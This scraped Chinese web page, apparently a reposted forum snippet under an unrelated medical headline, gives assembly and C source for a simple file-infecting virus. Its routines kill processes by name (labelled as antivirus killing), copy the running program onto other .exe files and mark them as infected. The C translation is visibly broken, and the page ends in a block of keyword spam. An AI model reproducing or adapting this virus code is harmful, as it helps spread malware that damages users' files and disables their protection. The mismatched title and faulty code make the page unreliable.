生理曲度变直恢复了:附加一个线程在 explorer.exe 上执行代码

来源:百度文库 编辑:偶看新闻 时间:2024/04/28 18:59:17
附加一个线程在 explorer.exe 上执行代码 群里的那个在做毕设的女生可以看看哦,虽然是汇编,但是能达到目的就行。
  1. ;##########################################################
  2. ; Shadow MASM Public Function Library
  3. ;##########################################################
  4. ;##########################################################
  5. GetWindowsVer proto
  6. KillAntiVirus  proto
  7. vBackupFile proto
  8. ReadVirusToMem proto :DWORD
  9. WriteVirusToExe proto :DWORD, :DWORD
  10. ;##########################################################

  12. ;##########################################################
  13. ; 判断 Windows 版本 测试通过
  14. ;##########################################################
  15. GetWindowsVer proc 
  16.   LOCAL OSVI:OSVERSIONINFO
  17.   mov OSVI.dwOSVersionInfoSize,SIZEOF(OSVERSIONINFO)
  18.   invoke GetVersionEx,addr OSVI
  19.   xor ebx,ebx
  20.   .IF OSVI.dwPlatformId == VER_PLATFORM_WIN32_NT
  21.    mov ebx,1
  22.   .ELSE
  23.    xor ebx,ebx
  24.   .ENDIF
  25.   invoke MessageBox,NULL,CTEXT("This is system NT"),CTEXT("Test"),MB_OK
  26.   ret
  27. GetWindowsVer endp

  29. ;##########################################################
  30. ; 终止杀毒软件 测试通过
  31. ;##########################################################
  32. KillAntiVirus proc 
  33.   LOCAL  lppe:PROCESSENTRY32
  34.   LOCAL  hProcessSnap:DWORD
  35.   
  36.   mov lppe.dwSize,SIZEOF PROCESSENTRY32
  37.   invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0 ; 获取进程快照句柄
  38.   mov hProcessSnap,eax 
  39.   
  40.   ;循环获取进程信息判断是否为杀毒软件
  41.   invoke Process32First,hProcessSnap,addr lppe
  42.   .WHILE eax
  43.    invoke lstrcmp,addr lppe.szExeFile,CTEXT("notepad.exe")
  44.    .IF eax==0
  45.     invoke OpenProcess,PROCESS_TERMINATE,FALSE,lppe.th32ProcessID
  46.     invoke TerminateProcess,eax,-1 ;如果是杀毒软件 杀掉它
  47.    .ENDIF
  48.    
  49.    invoke Process32Next,hProcessSnap,addr lppe
  50.   .ENDW
  51.   invoke CloseHandle,hProcessSnap
  52.   ret
  53. KillAntiVirus endp

  55. ;##########################################################
  56. ; 备份病毒文件
  57. ;##########################################################
  58. vBackupFile proc
  59.   LOCAL hFindFile:DWORD
  60.   LOCAL byPath[MAX_PATH]:BYTE      ;保存搜索的路径[备份路径]
  61.   LOCAL bySearchPath[MAX_PATH]:BYTE   ;要搜索的路径及文件
  62.   LOCAL byFile[MAX_PATH]:BYTE      ;找到的文件 
  63.   LOCAL lpFileData:WIN32_FIND_DATA
  64.   
  65.   ;获取系统目录
  66.   invoke GetSystemDirectory,addr byPath,SIZEOF byPath
  67.   invoke lstrcat,addr bySearchPath,CTEXT("\*.exe")
  68.   invoke GetCurrentDirectory,sizeof byPath,addr byPath
  69.   
  70.   ;获得用于搜索的路径
  71.   invoke lstrcpy,addr bySearchPath,addr byPath
  72.   invoke lstrcat,addr bySearchPath,CTEXT("\Test\*.exe")
  73.   
  74.   ;备份路径
  75.   invoke lstrcat,addr byPath,CTEXT("\Test\")
  76.   
  77.   ;查找文件
  78.   invoke FindFirstFile,addr bySearchPath,addr lpFileData                            
  79.   .IF eax != INVALID_HANDLE_VALUE
  80.    mov hFindFile,eax
  81.    .WHILE eax
  82.     invoke lstrcpy,addr byFile,addr byPath
  83.     invoke lstrcat,addr byFile,addr lpFileData.cFileName
  84.     invoke ReadVirusToMem,addr byFile
  85.     invoke FindNextFile,hFindFile,addr lpFileData
  86.     
  87.    .ENDW
  88.    invoke FindClose,hFindFile
  89.   .ENDIF
  90.   
  91.   ;invoke MessageBox,NULL,CTEXT("Test Function vBackupFile OK!"),CTEXT("Test"),MB_OK
  92.   ret
  93. vBackupFile endp
  94. ;##########################################################
  95. ; 将病毒文件读入内存
  96. ;########################################################## 
  97. ReadVirusToMem Proc dwWriteFileName:DWORD
  98.   LOCAL hMem:DWORD  
  99.   LOCAL byFile[MAX_PATH]:BYTE
  100.   LOCAL hReadFile:DWORD, dwFileSize:DWORD, byOfRead:DWORD
  101.   
  102.   ;获取当前exe文件名并打开文件
  103.   invoke GetModuleFileName,hInstance,addr byFile,SIZEOF byFile
  104.   invoke CreateFile,addr byFile,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL
  105.   .IF eax != INVALID_HANDLE_VALUE
  106.    mov hReadFile,eax
  107.   .ELSE
  108.    ret
  109.   .ENDIF
  110.   
  111.   ;获取当前exe文件大小 分配内存 读取文件
  112.   invoke GetFileSize,hReadFile,NULL
  113.   mov dwFileSize,eax
  114.   test eax,eax
  115.   je ExitFunction
  116.   
  117.   invoke GlobalAlloc,GPTR,dwFileSize
  118.   test eax,eax
  119.   je ExitFunction
  120.   mov hMem,eax
  121.   
  122.   invoke ReadFile,hReadFile,hMem,dwFileSize,addr byOfRead,NULL
  123.   invoke GlobalLock,hMem  
  124.   invoke WriteVirusToExe,dwWriteFileName,hMem
  125.   
  126.   ;invoke MessageBox,NULL,CTEXT("Test Function ReadVirusToMem OK!"),CTEXT("Test"),MB_OK
  127.   ExitFunction:
  128.   invoke GlobalUnlock,hMem
  129.   invoke GlobalFree,hMem
  130.   invoke CloseHandle,hReadFile
  131.   ret
  132. ReadVirusToMem endp

  134. ;##########################################################
  135. ; 将内存病毒写入文件并将已感染标志写入
  136. ;########################################################## 
  137. WriteVirusToExe proc dwOpenFileName:DWORD,dwWriteBuffer:DWORD
  138.   LOCAL FileFlag[8]:BYTE
  139.   LOCAL hFile:DWORD
  140.   LOCAL byOfRead:DWORD
  141.   LOCAL dwWriteSize:DWORD
  142.   LOCAL byOfWrite:DWORD
  143.   
  144.   invoke RtlZeroMemory,addr FileFlag,sizeof FileFlag
  145.   ;打开文件
  146.   invoke CreateFile,dwOpenFileName,GENERIC_READ or GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL
  147.   .IF eax != INVALID_HANDLE_VALUE
  148.    mov hFile,eax
  149.   .ELSE
  150.    ret
  151.   .ENDIF
  152.   
  153.   ;设置文件读取位置 读取文件6个字节 判断文件是否感染
  154.   invoke SetFilePointer,hFile,-6,NULL,FILE_END
  155.   inc eax
  156.   je ExitFunction
  157.   dec eax
  158.    
  159.   invoke ReadFile,hFile,addr FileFlag,6,byOfRead,NULL
  160.   invoke lstrcmp,addr FileFlag,CTEXT("shadow")
  161.   test eax,eax
  162.   je ExitFunction
  163.   
  164.   invoke SetFilePointer,hFile,0,NULL,FILE_END
  165.   invoke GlobalSize,dwWriteBuffer
  166.   mov dwWriteSize,eax
  167.   invoke WriteFile,hFile,dwWriteBuffer,dwWriteSize,addr byOfWrite,NULL
  168.   
  169.   invoke SetFilePointer,hFile,0,NULL,FILE_END
  170.   invoke WriteFile,hFile,CTEXT("shadow"),6,addr byOfWrite,NULL
  171.   
  172.   ExitFunction:
  173.   invoke CloseHandle,hFile
  174.   ret
  175. WriteVirusToExe endp
  176. ==================================
  177. vc代码
==========================================
  1. VOID GetWindowsVer();
  2. VOID KillAntiVirus();
  3. VOID vBackupFile();
  4. VOID ReadVirsusToMem(DWORD);
  5. VOID WriteVirusToExe(DWORD,DWORD);

  7. GetWindowsVer()
  8. {
  9.         OSVERSIONINFO osvi;
  10.         osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
  11.         GetVersionEx(&osvi);
  12.         if(osvi.dwPlatformId == VER_PLATFORM_WIN32_NT)
  13.                 __asm mov ebx, 1
  14.         else
  15.                 __asm xor ebx, ebx
  16.         MessageBox(NULL, TEXT("This is system NT"), TEXT("Test"), MB_OK);
  17.         return;
  18. }

  20. KillAntiVirus()
  21. {
  22.         PROCESSENTRY32 lppe;
  23.         HANDLE hProcessSnap;
  24.         lppe.dwSize = sizeof(PROCESSENTRY32)
  25.         hProcessSnap = CreateToolHelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  26.         BOOL bContinue = bProcess32First(hProcessSnap, &lppe);
  27.         while(bContinue)
  28.         {
  29.                 if(lstrcmp(&lppe.szExeFile, TEXT("notepad.exe")) == 0)
  30.                 {
  31.                         TerminateProcess(
  32.                                 OpenProcess(PROCESS_TERMINATE, FALSE, lppe.th32ProcessID), -1);
  33.                 }
  34.                 bContinue = Process32Next(hProcessSnap, &lppe);
  35.         }
  36.         CloseHandle(hProcessSnap);
  37.         return;
  38. }


  41. vBackupFile()
  42. {
  43.         HANDLE hFindFile;
  44.         BYTE byPath[MAX_PATH];
  45.         BYTE bySearchPath[MAX_PATH];
  46.         BYTE byFile[MAX_PATH];
  47.         WIN32_FIND_DATA lpFileData;
  48.         
  49.         GetSystemDirectory(byPath, MAX_PATH);
  50.         lstrcat(bySearchPath, TEXT("\*.exe"));
  51.         GetCurrentDirectory(MAX_PATH, byPath);
  52.         
  53.         lstrcpy(bySearchPath, byPath)
  54.         lstrcat(bySearchPath, TEXT("\Test\*.exe"));
  55.         lstrcat(byPath, TEXT("\Test\"));
  56.         
  57.         if((hFindFile = FindFirstFile(bySearchPath, &lpFileData)) != INVALID_HANDLE_VALUE)
  58.         {
  59.                 while(hFindFile)
  60.                 {
  61.                         lstrcpy(byFile, byPath)
  62.                         lstrcat(byFile, &lpFileData.cFileName);
  63.                         ReadVirusToMem(byFile);
  64.                         FindNextFile(hFindFile, &lpFileData);
  65.                 }
  66.                 FindClose(hFindFile);
  67.         }
  68.         //Message(NULL, TEXT("Test Function vBackupFile OK!"), TEXT("test"), MB_OK);
  69.         return;
  70. }
  71.         
  72. ReadVirusToMem(DWORD dwWriteFileName)
  73. {
  74.         HANDLE hMem;
  75.         BYTE byFile[MAX_PATH];
  76.         HANDLE hReadFile;
  77.         DWORD dwFileSize, byOfRead;
  78.         GetModuleFileName(hInstance, byFile, MAX_PATH);
  79.         if((hReadFile = CreateFile(byFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)) == INVALID_HANDLE_VALUE)
  80.                 return;
  81.         dwFileSize = GetFileSize(hReadFile, NULL);
  82.         if(dwFileSize == 0)
  83.                 goto ExitFunction;
  84.         ReadFile(hReadFile, hMem, dwFileSize, &byOfRead, NULL);
  85.         GlobalLock(hMem);
  86.         WriteVirusToExe(dwWriteFileName, hMem);
  87.         //MessageBox(NULL, TEXT("Test Function ReadVirusToMem OK!"), TEXT("Test"), MB_OK);
  88. ExitFunction:
  89.         GlobalUnlock(hMem);
  90.         GlobalFree(hMem);
  91.         CloseHandle(hReadFile);
  92.         return;
  93. }

  95. WriteVirusToExe(DWORD dwOpenFileName, DWORD dwWriteBuffer)
  96. {
  97.         BYTE FileFlag[8];
  98.         HANDLE hFile;
  99.         DWORD byOfRead;
  100.         DWORD dwWriteSize;
  101.         DWORD byOfWrite;
  102.         
  103.         RtlZeroMemory(FileFlag, 8);
  104.         hFile = CreateFile(dwOpenFileName, GENERIC_ALL, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_ARCHIVE, NULL);
  105.         if(hFile == INVALID_HANDLE_VALUE)
  106.                 return;
  107.         if(SetFilePointer(hFile, -6, NULL, FILE_END) == -1)
  108.                 goto ExitFunction;
  109.         ReadFile(hFile, FileFlag, 6, byOfRead, NULL);
  110.         if(lstrcmp(FileFlag, TEXT("shadow")) == 0)
  111.                 goto ExitFunction;
  112.         SetFilePointer(hFile, 0, NULL, FILE_END);
  113.         dwWriteSize = GlobalSize(dwWriteBuffer);
  114.         WriteFile(hFile, dwWriteBuffer, dwWriteSize, &byOfWrite, NULL);
  115.         SetFilePointer(hFile, 0, NULL, FILE_END);
  116.         WriteFile(hFile, TEXT("shadow"), 6, &byOfWrite, NULL);
  117.         
  118. ExitFunction:
  119.         CloseHandle(hFile);
  120.         return;
  121. }


开机江民提示Explorer.EXE线程注入 怎么办?? Explorer.EXE 试图执行“线程注入”的操作 开浏览器时江民提示explorer。exe线程注入怎么解决 explorer.exe的一个故障!! explorer.exe在哪个文件夹 江民一扫光提示Explorer.exe要线程注入,被我禁止了,如何恢复? Explorer.exe具体是一个什么文件? 谁给我一个Explorer.exe, 怎样重新建一个explorer.exe cpu百分之百运行有一个explorer.exe explorer.exe是一个什么样的应用程序 explorer.exe和explorer 在不小心点了一个估计有毒的exe文件后 立即出现蓝屏 重启后explorer.exe 应用程序错误 explorer.exe EXPLORER.EXE explorer.exe explorer.exe explorer.exe Explorer.EXE explorer.exe explorer.exe explorer.exe explorer.exe Explorer.EXE????